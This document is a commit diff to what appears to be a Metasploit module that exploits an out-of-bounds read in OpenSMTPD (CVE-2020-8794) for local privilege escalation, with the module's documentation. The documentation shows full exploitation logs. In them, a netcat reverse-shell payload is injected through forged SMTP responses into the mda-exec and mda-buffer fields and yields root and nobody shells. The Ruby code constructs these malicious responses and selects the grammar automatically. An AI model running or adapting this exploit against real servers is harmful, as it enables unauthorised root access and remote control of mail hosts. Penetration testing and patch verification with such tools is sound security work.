Add automatic grammar selection by version number

documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md

@@ -4,7 +4,7 @@
 
 This module exploits an out-of-bounds read of an attacker-controlled
 string in OpenSMTPD's MTA implementation to execute a command as the
-root user.
+root or nobody user, depending on the kind of grammar OpenSMTPD uses.
 
 ### Setup
 
@@ -16,8 +16,7 @@ root user.
 ```
 Id  Name
 --  ----
-0   OpenSMTPD < 6.6.4 (new grammar)
-1   OpenSMTPD < 6.6.4 (old grammar)
+0   OpenSMTPD < 6.6.4 (automatic grammar selection)
 ```
 
 ## Verification Steps
@@ -51,21 +50,22 @@ Payload options (cmd/unix/reverse_netcat):
    ----   ---------------  --------  -----------
    LHOST                   yes       The listen address (an interface may be specified)
 
-msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session -1
-session => -1
 msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
 lhost => 172.16.249.1
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
+session => 1
 msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
 
-[+] mkfifo /tmp/aovyv; nc 172.16.249.1 4444 0</tmp/aovyv | /bin/sh >/tmp/aovyv 2>&1; rm /tmp/aovyv
+[+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0</tmp/gkhbba | /bin/sh >/tmp/gkhbba 2>&1; rm /tmp/gkhbba
 [!] SESSION may not be compatible with this module.
 [*] Started reverse TCP handler on 172.16.249.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
+[*] OpenSMTPD 6.6.0 is using new grammar
 [+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
 [*] Started service listener on 0.0.0.0:25
-[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'tlzlzenloqtauretns@[172.16.249.1]' < /dev/null && echo true
-[*] Client 172.16.249.137:26887 connected
-[*] Exploiting new OpenSMTPD grammar
+[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
+[*] Client 172.16.249.137:37747 connected
+[*] Exploiting new OpenSMTPD grammar for a root shell
 [*] Faking SMTP server and sending exploit
 [*] Sending: 220
 [*] Expecting: /EHLO /
@@ -80,14 +80,60 @@ MAIL FROM:<w
 dispatcher: local_mail
 type: mda
 mda-user: root
-mda-exec: mkfifo /tmp/aumhem; nc 172.16.249.1 4444 0</tmp/aumhem | /bin/sh >/tmp/aumhem 2>&1; rm /tmp/aumhem; exit 0
+mda-exec: mkfifo /tmp/rettgqm; nc 172.16.249.1 4444 0</tmp/rettgqm | /bin/sh >/tmp/rettgqm 2>&1; rm /tmp/rettgqm; exit 0
 
-[*] Disconnecting client 172.16.249.137:26887
-[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.137:37728) at 2020-03-03 14:48:18 -0600
+[*] Disconnecting client 172.16.249.137:37747
+[*] Command shell session 3 opened (172.16.249.1:4444 -> 172.16.249.137:3005) at 2020-03-03 18:40:54 -0600
 [*] Server stopped.
 
 id
 uid=0(root) gid=0(wheel) groups=0(wheel)
 uname -a
 OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
+^Z
+Background session 3? [y/N]  y
+```
+
+### OpenSMTPD 6.0.4 on OpenBSD 6.3
+
+```
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2
+session => 2
+msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
+
+[+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0</tmp/hkioy | /bin/sh >/tmp/hkioy 2>&1; rm /tmp/hkioy
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[*] OpenSMTPD 6.0.4 is using old grammar
+[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794
+[*] Started service listener on 0.0.0.0:25
+[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
+[*] Client 172.16.249.138:10203 connected
+[*] Exploiting old OpenSMTPD grammar for a nobody shell
+[*] Faking SMTP server and sending exploit
+[*] Sending: 220
+[*] Expecting: /EHLO /
+[+] Received: EHLO
+[*] Sending: 250
+[*] Expecting: /MAIL FROM:<[^>]/
+[+] Received: foo.localdomain
+MAIL FROM:<w
+[*] Sending: 553-
+553
+
+type: mda
+mda-method: mda
+mda-usertable: <getpwnam>
+mda-user: nobody
+mda-buffer: mkfifo /tmp/jszy; nc 172.16.249.1 4444 0</tmp/jszy | /bin/sh >/tmp/jszy 2>&1; rm /tmp/jszy; exit 0
+
+[*] Disconnecting client 172.16.249.138:10203
+[*] Command shell session 4 opened (172.16.249.1:4444 -> 172.16.249.138:40377) at 2020-03-03 18:41:06 -0600
+[*] Server stopped.
+
+id
+uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
+uname -a
+OpenBSD foo.localdomain 6.3 GENERIC#100 amd64
 ```

modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb

@@ -18,7 +18,7 @@ def initialize(info = {})
       'Description'    => %q{
         This module exploits an out-of-bounds read of an attacker-controlled
         string in OpenSMTPD's MTA implementation to execute a command as the
-        root user.
+        root or nobody user, depending on the kind of grammar OpenSMTPD uses.
       },
       'Author'         => [
         'Qualys', # Discovery and PoC
@@ -33,13 +33,12 @@ def initialize(info = {})
       'Platform'       => 'unix',
       'Arch'           => ARCH_CMD,
       'Privileged'     => true, # NOTE: Only when exploiting new grammar
-      # https://github.com/openbsd/src/commit/e396a728fd79383b972631720cddc8e987806546
+      # Patched in 6.6.4: https://www.opensmtpd.org/security.html
+      # New grammar introduced in 6.4.0: https://github.com/openbsd/src/commit/e396a728fd79383b972631720cddc8e987806546
       'Targets'        => [
-        ['OpenSMTPD < 6.6.4 (new grammar)',
-          min_version: Gem::Version.new('6.4.0'),
-        ],
-        ['OpenSMTPD < 6.6.4 (old grammar)',
-          max_version: Gem::Version.new('6.0.4')
+        ['OpenSMTPD < 6.6.4 (automatic grammar selection)',
+          patched_version:     Gem::Version.new('6.6.4'),
+          new_grammar_version: Gem::Version.new('6.4.0')
         ]
       ],
       'DefaultTarget'  => 0,
@@ -58,6 +57,9 @@ def initialize(info = {})
     register_advanced_options([
       OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
     ])
+
+    # HACK: We need to run check in order to determine a grammar to use
+    options.remove_option('AutoCheck')
   end
 
   def srvhost_addr
@@ -83,21 +85,13 @@ def check
 
     version = Gem::Version.new(version)
 
-    # Patched in 6.6.4: https://www.opensmtpd.org/security.html
-    if version < Gem::Version.new('6.6.4')
-      case target.name
-      when /new grammar/
-        if version < target[:min_version]
-          return CheckCode::Safe(
-            "OpenSMTPD #{version} does not support new grammar"
-          )
-        end
-      when /old grammar/
-        if version > target[:max_version]
-          return CheckCode::Safe(
-            "OpenSMTPD #{version} does not support old grammar"
-          )
-        end
+    if version < target[:patched_version]
+      if version >= target[:new_grammar_version]
+        vprint_status("OpenSMTPD #{version} is using new grammar")
+        @grammar = :new
+      else
+        vprint_status("OpenSMTPD #{version} is using old grammar")
+        @grammar = :old
       end
 
       return CheckCode::Appears(
@@ -126,9 +120,9 @@ def on_client_connect(client)
     print_status("Client #{client.peerhost}:#{client.peerport} connected")
 
     # Brilliant work, Qualys!
-    case target.name
-    when /new grammar/
-      print_status('Exploiting new OpenSMTPD grammar')
+    case @grammar
+    when :new
+      print_status('Exploiting new OpenSMTPD grammar for a root shell')
 
       yeet = <<~EOF
         553-
@@ -139,8 +133,8 @@ def on_client_connect(client)
         mda-user: root
         mda-exec: #{payload.encoded}; exit 0\x00
       EOF
-    when /old grammar/
-      print_status('Exploiting old OpenSMTPD grammar')
+    when :old
+      print_status('Exploiting old OpenSMTPD grammar for a nobody shell')
 
       yeet = <<~EOF
         553-
@@ -152,6 +146,8 @@ def on_client_connect(client)
         mda-user: nobody
         mda-buffer: #{payload.encoded}; exit 0\x00
       EOF
+    else
+      fail_with(Failure::BadConfig, 'Could not determine OpenSMTPD grammar')
     end
 
     sploit = {